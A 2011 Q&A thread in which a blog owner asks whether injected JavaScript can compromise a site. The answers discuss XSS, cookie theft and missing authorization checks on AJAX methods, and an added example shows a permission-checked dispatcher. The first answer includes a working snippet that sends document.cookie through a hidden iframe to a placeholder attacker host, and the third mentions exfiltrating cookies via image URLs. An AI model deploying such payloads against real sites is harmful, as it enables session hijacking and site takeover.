Can a site be hacked using JS code injection?

Yes, many people say that the imagination is limitless, and that it seems possible to hack, but I don't see any ways yet, and I'm not a big expert in JS. I would like to see a specific example of hacking a site (getting access to FTP, to files, the ability to delete/create files, change permissions, etc.).

For the authorities: I am interested purely in self-defense =) I want to give unfamiliar authors the right to write articles on the blog, so I'm wondering: WP lets JS through just fine; should I do something about it, or leave it that way?

Author: Kromster, 2011-08-27

3 answers

A banal example:

var i = document.createElement('iframe');
i.style='width: 1px; height: 1px; visibility: hidden;';
document.getElementsByTagName('body')[0].appendChild(i);
i.src='http://vasya-pupkin-xakep.org/stealcookie.php?c='+document.cookie;

Thus, the hacker Vasya Pupkin often steals the admin's cookies and very quickly gets into the site with them. If the admin has the ability to edit files from the admin panel, this is full control (there are such things as phpftp and phpmyadmin).

This code can also be re-encrypted three times, so that it becomes an unreadable set of characters. Instead of stealing cookies, you can also simply inflate visits to another site in this way, etc.

 15
Author: Sh4dow, 2011-08-27 13:05:55

In general, you can use JS to conduct XSS attacks, and if you have AJAX on your site and the server part is self-written, no one rules out that this way you can somehow mess up the system. For example: you have the DeleteFileOnServer method in the AJAX handler. If the rights are not checked in any way during the execution of the method, then you can imagine situations in which an attacker will form an AJAX request using the DeleteFileOnServer method and delete a file without having the right to do so. But in most cases such things are tested by the developers of the web application, the rights check is performed, and so on.

Related: XSS attack technique, general words on the topic of ajax-security.

 3
Author: Karcher, 2011-08-28 10:31:16
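
The missing rights check described in the answer above, as an added example that is not part of any answer on this page: an AJAX dispatcher without the check beside one that enforces it. Everything except the name DeleteFileOnServer (the session ids, capability names, file list and function names) is hypothetical and constructed for the illustration.

```javascript
// Added example: all names except DeleteFileOnServer are hypothetical.
// In-memory stand-ins for the file store and session table (constructed data).
function makeServer() {
  const files = new Set(['index.php', 'uploads/post1.jpg']);
  const sessions = new Map([
    ['sess-admin', { user: 'admin', caps: new Set(['delete_files']) }],
    ['sess-author', { user: 'guest-author', caps: new Set(['edit_posts']) }],
  ]);

  // Each action declares the capability it needs; run() knows nothing
  // about the caller, so the dispatcher has to enforce the requirement.
  const actions = {
    DeleteFileOnServer: {
      requires: 'delete_files',
      run: ({ path }) => files.delete(path),
    },
  };

  // Without the check: runs whatever action the request names.
  function handleUnchecked(req) {
    const action = actions[req.action];
    if (!action) return { status: 404 };
    return { status: 200, result: action.run(req.params) };
  }

  // With the check: identity comes from the server-side session table,
  // never from a field the client sends, and an action that declares no
  // capability is refused (deny by default).
  function handleChecked(req) {
    const known = Object.prototype.hasOwnProperty.call(actions, req.action);
    if (!known) return { status: 404 };
    const action = actions[req.action];
    const session = sessions.get(req.sessionId);
    if (!session) return { status: 401 };
    if (!action.requires || !session.caps.has(action.requires)) {
      return { status: 403 };
    }
    return { status: 200, result: action.run(req.params) };
  }

  return { files, handleUnchecked, handleChecked };
}
```

The check stops a low-privileged author from calling the handler directly. It does not stop a script that runs in an administrator's browser, as in the cookie example in the first answer, because that request arrives with the administrator's session.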

It's impossible. The maximum that can be done is to steal the cookies. And then you will not be able to send them directly (AJAX to another domain is prohibited and does not work, I personally checked it).

You will have to send images in the request, for example img.png?jesnfjkndsfjkndskjweklfngjksdngjksnjdsg - a cookie is encoded at the end. This technology, for example, is used by Yandex WebVisor web analytics (I personally watched it).

There are still nuances. JS can create text inside the page, which will then be indexed by Google. This is true: I was personally convinced by the example partner photos of the country, when the keywords pet, gift were the most frequent according to webmasters.google.com (website about the apocalypse).

Even unscrupulous authors will be able to redirect the page, make links, images, banners.

But it will be impossible to get access to ftp, to files.

 1
Author: jfjgjkslxd, 2011-08-28 10:30:15